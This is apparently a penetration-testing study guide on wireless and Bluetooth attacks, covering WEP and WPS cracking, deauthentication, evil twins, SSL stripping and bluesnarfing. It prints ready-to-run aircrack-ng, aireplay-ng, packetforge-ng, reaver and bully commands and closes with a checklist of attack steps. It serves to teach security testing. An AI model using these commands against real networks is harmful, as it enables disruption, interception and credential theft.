Wireless Access Point Attacks
A wireless access point (WAP) enables wireless devices to connect to a local network, typically using the Wi-Fi protocol. Because a WAP is an entry point into a network, and transmits data over the air to other devices, it is a worthwhile target to dedicate resources to for testing.
A WAP’s susceptibility to compromise usually depends on the strength of its encryption scheme. WAPs using the obsolete Wired Equivalent Privacy (WEP) scheme are especially vulnerable to intrusion. WEP uses the RC4 stream cipher with a 24-bit initialization vector (IV)—a small enough size that can enable you to crack the password with minimal effort. In WEP cracking, you can start capturing traffic over the air and then dump the packets to a file. Because the IV is bound to repeat after a few thousand packets, you can extract it within a matter of minutes, enabling you to crack the password. You can also speed up the process by using a tool like aircrack-ng to inject traffic into the WAP, thereby speeding up the process of generating IVs. For example, you can spoof the MAC address of a client connected to the WAP and then inject ARP packets.
Most Wi-Fi networks today use WPA/WPA2 to mitigate against a vulnerability like this. Cracking a WPA/WPA2 password is therefore considerably more difficult. You can use typical dictionary-based and brute force methods to try to crack the password offline, assuming you managed to grab the hashes. However, the strength of encryption used in WPA/WPA2 might make this infeasible. Online attacks are also difficult to pull off if the WAP has a lockout function that activates after a certain number of failures.
There are a number of good tools you can use to attack wireless access points and their clients. Here are a few examples:
- The Aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, and many others)—a complete set of tools for wireless monitoring, attacking, testing, and cracking
- Kismet—a wireless sniffer, network detector, and intrusion detection system
- Wifite—a customizable tool you can use to attack WEP, WPA, and WPS
- WiFi-Pumpkin—create an evil twin/conduct a man-in-the-middle attack
- WiFi Pineapple—simplifies wireless man-in-the-middle attacks
Wireless Sniffing and Eavesdropping
As with a wired network, you can use network sniffers like Wireshark to obtain wireless transmissions that traverse the air. Your wireless network interface will receive transmissions when activated, and by default will pick up on any transmissions that are bound for the interface’s MAC address. To enhance the effectiveness of your wireless sniffing efforts, you should place your interface in promiscuous mode. Promiscuous mode ensures that the interface will allow every transmitted frame through, even if that frame is not bound for the interface’s MAC address. Therefore, you’ll be able to capture all wireless traffic within range.
By sniffing traffic, you may be able to eavesdrop on communications between client and AP. This is much more likely to be the case in public, open Wi-Fi networks that don’t incorporate encryption. Those that do incorporate encryption will make your eavesdropping efforts much more difficult, as the traffic you’ll receive on the interface will be indecipherable without the proper authentication and decryption key. Nevertheless, even in encrypted modes, certain information in a transmission is transmitted in cleartext—a client’s MAC address, for example. You can use this to your advantage in spoofing attacks.
Even in environments that use WPA/WPA2, you can initiate a deauthentication attack to capture the four-way TKIP handshake in a Wi-Fi connection. The disconnected client must initiate the four-way handshake again in order to reconnect to the AP. You can capture the pre-shared key (PSK) that is exchanged in this handshake and then perform a cracking attempt on it.
You can use airodump-ng to sniff for the handshake:
airodump-ng -c <channel> --bssid <MAC address> -w capture wlan0
Then use the aireplay-ng command mentioned previously to perform the deauthentication.
Replay attacks, also known as repeating attacks, repeat a legitimate transmission in a malicious context. For example, a user might send their authentication information to a client or system; the attacker who eavesdrops on this communication can use the authentication in a later transmission, essentially impersonating the victim. In wireless networking, replaying transmissions can be used to enable several different attacks, including the WEP cracking process mentioned previously. In these attacks, the attacker can generate many ARP requests using a client’s spoofed MAC address in order to obtain a repeated IV.
Note: Do not confuse a replay attack with a relay attack. In a replay attack, a legitimate network packet or frame is retransmitted repeatedly. In a relay attack, an attacker inserts themselves man-in-the-middle style between two devices, intercepting and forwarding traffic between them.
A fragmentation attack obtains the pseudorandom generation algorithm (PRGA) of network packets used in WEP. The PRGA can be used to craft encrypted packets that you can inject into the access point. These injected packets can speed up the process of cracking the WEP password, as otherwise it might take awhile to receive enough packets to get the repeated IV.
In a fragmentation attack, you extract part of the key material from at least one packet and use this to send an ARP request to the AP. If successful, the AP responds with more of the key material in the packet that is echoed back to you. You repeat this process many times until around 1500 bytes of the PRGA is captured, at which point you can then use a packet crafting tool to begin the injection process.
The following is an example of using the aircrack-ng tool suite (specifically, aireplay-ng) to perform a fragmentation attack:
aireplay-ng -5 -b <AP MAC address> -h <source MAC address> wlan0
The -5 flag indicates that aireplay-ng will perform a fragmentation attack. Once you input this command, you must select the packet to use in the attack. The tool then begins the attack by sending a fragmented packet, receiving part of the key material from the AP, then repeating the process until it gets 1500 bytes of the PRGA. The key material is then saved to a file.
Next, you’re ready to craft a packet using a tool like packetforge-ng:
packetforge-ng -0 -a <AP MAC address> -h <source MAC address> -y <saved PRGA file> -w <crafted packet output>
This tells the tool to craft an ARP packet using the PRGA material you recovered, then save the crafted packet to a file. You can then inject your crafted packet into the AP like so:
aireplay-ng -r <crafted packet output> wlan0
This will send the crafted packet over and over, and if successful, you’ll be able to obtain a large amount of IVs that you can put toward cracking the WEP key.
Jamming is an attack in which radio waves disrupt Wi-Fi signals. Wi-Fi itself uses radio waves for communication and is therefore susceptible to being jammed by devices that broadcast noisy signals on the same frequency. These signals override any other wireless signals that a wireless receiver is attempting to pick up on. By jamming a Wi-Fi signal, you can trigger a denial of service (DoS) and disrupt the flow of communications.
Physical jamming devices can send these disruptive signals to wireless receivers in a targeted area. However, such devices are illegal in many jurisdictions, including the whole United States. You should consider the legality of radio jamming in your area before performing it as part of a test.
Although not exactly “jamming” in the sense of physically disrupting radio transmissions, some in the industry may use the term jamming to refer to a disruption of wireless communications that breaks the link between client and access point. This is called deauthentication, and you can use it to knock a client off a network and prevent it from sending and receiving communications. For example, wifijammer is a Python script that can disrupt all WAPs in an area, only to be constrained by the effectiveness of your wireless interface. You can also use wifijammer to perform more targeted attacks to disable only select Wi-Fi networks in an area, or even specific clients.
Deauthentication is possible because the 802.11 Wi-Fi protocol includes a management frame that a client can use to announce that it wishes to terminate a connection with an access point. You can take advantage of this provision by spoofing a victim’s MAC address and sending the deauthentication frame to the access point, which then prompts the access point to terminate the connection.
Other than simple denial of service, deauthentication attacks are used in service of evil twin attacks, replay attacks, cracking attacks, and more. They have even been used by public businesses like hotels in order to force their customers to stop using personal hotspots and start using the hotel’s own Wi-Fi services, which they charge for. Ultimately, a deauthentication attack can be a powerful technique for accomplishing a number of different malicious objectives.
There are several tools that can perform deauthentication. The following is an example of using aireplay-ng to deauthenticate all clients on a WAP:
aireplay-ng -0 1 -a <MAC address> wlan0
The -0 1 flag specifies that the tool will send one deauthentication message. Using the -a flag, you specify the MAC address of the targeted access point. You can also use the -c flag with the MAC address of a target client in case you only want to knock one client off the WAP instead of every client.
Other than software tools, a hardware tool like WiFi Pineapple can launch deauthentication attacks.
Evil Twin Attacks
An evil twin is a rogue access point that attempts to deceive users into believing that it is a legitimate access point, like the organization’s official Wi-Fi network. Evil twins are therefore a form of social engineering, as the attacker is trying to trick users into connecting to the attacker’s network. This is often facilitated through a deauthentication attack—if the attacker can knock a client off the network, they may be able to trick them into reconnecting to the rogue AP. Once the user does so, the attacker can launch all manner of attacks against the victim. For example, they might set up a convincing captive portal with a login form to harvest users’ credentials.
Evil twin attacks are effective because it’s not always easy for a user to determine which is the correct Wi-Fi network and which is the fake. Both networks can even have the same SSID, making it even more difficult for the user. Of course, certain factors can make the evil twin more effective, such as using the same (or expected) encryption protocol and placing it close to the targeted user(s) so that its signal strength is high and it is put at the top of the client’s list of APs. However, using any kind of encryption protocol will require that the victim knows the password, which may not be feasible. In these cases, evil twins usually operate in open mode.
There are also specific attacks that can leverage the evil twin technique to make it more effective or useful to the attacker. Some devices, especially those running older operating systems, will send out active probe requests for known Wi-Fi networks rather than waiting passively for an AP to send a beacon frame. An attacker listening for such a request can respond with their own rogue AP information and prompt the client to connect. The legitimate AP doesn’t even need to be close by—as long as the client device believes it is connecting to the right network, it will do so. Likewise, the attacker doesn’t need to broadcast a spoofed SSID to entice users and potentially raise suspicion. This type of attack is called a Karma attack.
Other significant attacks that can be used with an evil twin are the downgrade attack and SSL strip attack. In both of these attacks, the victim attempts to connect to a secure website normally using HTTPS. However, the evil twin inserts itself (usually through ARP poisoning) between the client and the server. In both cases the evil twin creates two separate connections, one with the server and one with the client. The connection with the server uses normal HTTPS. The connection with the client uses either a weaker version of SSL (downgrade attack), or dispenses with encryption altogether using cleartext HTTP (SSL strip attack). The client and website both think they are communicating directly with each other, but in reality their communications are being relayed through the evil twin, which is harvesting user credentials and other interesting data.
Both the downgrade and SSL strip attacks depend on the user permitting a connection to a website with an untrusted certificate. The certificate used in a downgrade attack is actually a self-signed certificate from the attacker machine, rather than a legitimately issued certificate from a trusted certificate authority. A browser normally detects this and warns the user, but many users, either not knowing or not caring about the significance of the warning, permit the connection anyway. Certificates that are untrusted will display a red circle with an X in their properties. The break in trust can occur anywhere in the certification path, including at the root level. Untrusted certificates should be replaced by trusted ones from a trusted source
There are two main cracking attacks you can launch to exploit weaknesses in the implementation of Wi-Fi Protected Setup (WPS), an attempt to streamline the processes of setting up a secure Wi-Fi network and enrolling devices in the network. The most prominent attack involves brute-forcing the 8-digit PIN that clients can use to enroll their devices without knowing a WPA/WPA2 PSK. WPS only checks each half of the PIN at a time, reducing the number of guesses from a maximum of 100,000,000 to only 11,000. This is trivial for most modern computers to crack, assuming the WAP doesn’t have a lockout after a certain number of failures. Even if it does, the attack may take a couple weeks instead of a couple hours—still a short enough time to be feasible for the attacker to carry out. Likewise, the lockout mechanism may only trigger based on the client’s MAC, so if you spoof your MAC, you may be able get around this defense. Some simpler WAPs are even incapable of handling a brute force attack and may suffer a DoS condition as a result.
Online brute forcing is not your only option, however. An offline brute force attack called Pixie Dust enables you to recover the WPS PIN within mere minutes. In the WPS process, several values (including each half of the PIN) are used to create two hashes that the AP uses to prove to the client that it knows the PIN. The hash values and some of the values that go into creating them are broadcast by the AP and can be obtained by an attacker. Other than the two halves of the PIN, there are two other values that go into computing the hashes that are not broadcast—nonces E-S1 and E-S2. The problem is that some AP manufacturers have used weak and easily predicted nonce values by default. Some manufacturers don’t even provide values for the nonces. If you have the hashes and the nonce values, you can run all 11,000 possible values with the nonces and the other broadcast values through the relevant hash function until you get matching hashes. A matching value reveals the PIN.
You can use a Kali Linux tool called Reaver to launch a Pixie Dust attack:
reaver -i wlan0 -b <AP MAC address> -c <AP channel> -K 1
The -K 1 flag runs the attack by incorporating known nonce values or algorithms from Ralink, Broadcom, and Realtek APs.
Reaver now also has a new feature in which you can set the PIN to null. It provides the PIN but no password. After you update Reaver, you could also set the no nacks (-N) parameter. Example:
reaver -i wlanmon0 -b 00:90:4C:C1:AB:CD -p "" -N -vv
Another Kali tool you can use is Bully. It sometimes works when Reaver does not. Example:
bully wlanmon0 -b 00:90:12:34:AB:CD -e linksys -c 11
If you need to update Kali (and thus the tools), use these commands:
apt-get updateapt-get dist-upgrade
Note: For more information, check these links out.
Bluejacking is a method used by attackers to send out unwanted Bluetooth signals from smartphones, mobile phones, tablets, and laptops to other Bluetooth-enabled devices. Because Bluetooth requires relatively close proximity to the target device (usually within 30 feet), bluejacking must also be done within this range to be effective. Most bluejacking attacks involve sending the victim a text-based message, image, or video, and are typically just an annoyance. There is no overt “hijacking” of the user’s device, just the reception of unsolicited media.
However, bluejacking can be used as a vector to carry out more insidious attacks. For example, you might be able to socially engineer a user into downloading malware or providing you with access credentials if you send a convincing message to their device over Bluetooth. The user may be more inclined to trust the message since Bluetooth is not as common as text-based or email-based phishing vectors.
Bluejacking does not require any specialized tools and can be simply performed by sending a message to nearby, discoverable devices using the attacking device’s Bluetooth app. Bluejacking is ineffective when devices are in non-discoverable mode.
Here is a visual walkthrough:
Bluesnarfing is a more overtly malicious attack in which an attacker reads information from a victim’s Bluetooth device. The end goal is to glean sensitive data from the victim, like their contacts, calendars, email messages, text messages, and more.
Bluetooth uses the Object Exchange (OBEX) protocol to facilitate communication between two paired devices. To conduct a bluesnarfing attack, you must connect to a device’s OBEX Push Profile (OPP), which usually does not require authentication. Then, you connect to an OBEX Push target and submit an OBEX GET request (similar to an HTTP GET request) for common file names that are defined as part of the Infrared Mobile Communications (IrMC) specification. For example, the name telecom/cal.vcs typically specifies the device’s calendar, telecom/pb.vcs for the phone book, and telecom/devinfo.txt for information about the device. Devices with vulnerable implementations of OBEX enable you to obtain all files with a name you know or have correctly guessed.
Like with bluejacking, bluesnarfing is ineffective against devices that set Bluetooth in non-discoverable mode.
Guidelines for Exploiting Wireless and RF-Based Vulnerabilities
When exploiting wireless and RF-based vulnerabilities:
- Use aircrack-ng or similar tools to crack keys on Wi-Fi networks secured with WEP.
- Use a replay attack to obtain a repeated 24-bit IV to crack a WEP key.
- Speed up the WEP cracking process by launching a fragmentation attack using aireplay-ng.
- Use the PRGA obtained from a fragmentation attack to craft a packet with packetforge-ng.
- Send a crafted packet to an access point to easily obtain thousands of IVs.
- Check the laws in your area before using radio jamming devices.
- Use a tool like aireplay-ng to knock clients off a WAP.
- Spoof MAC addresses in deauthentication attacks to knock specific targets off a WAP.
- Use evil twins to entice users to connect to your rogue AP.
- Use Karma attacks to trick a client sending a probing request into connecting to your evil twin.
- Use SSL strip with an evil twin to downgrade a user’s HTTPS session and act as a man-in-the-middle.
- Place your wireless interface in promiscuous mode to receive all available signals.
- Use airodump-ng to sniff the four-way wireless handshake for WPA/WPA2 key cracking.
- Use online brute forcing to crack a WPS PIN.
- Use the Pixie Dust attack to conduct offline cracking of vulnerable APs.
- Use bluejacking to send unsolicited messages to discoverable Bluetooth devices in range.
- Use bluesnarfing to read sensitive information from discoverable Bluetooth devices in range.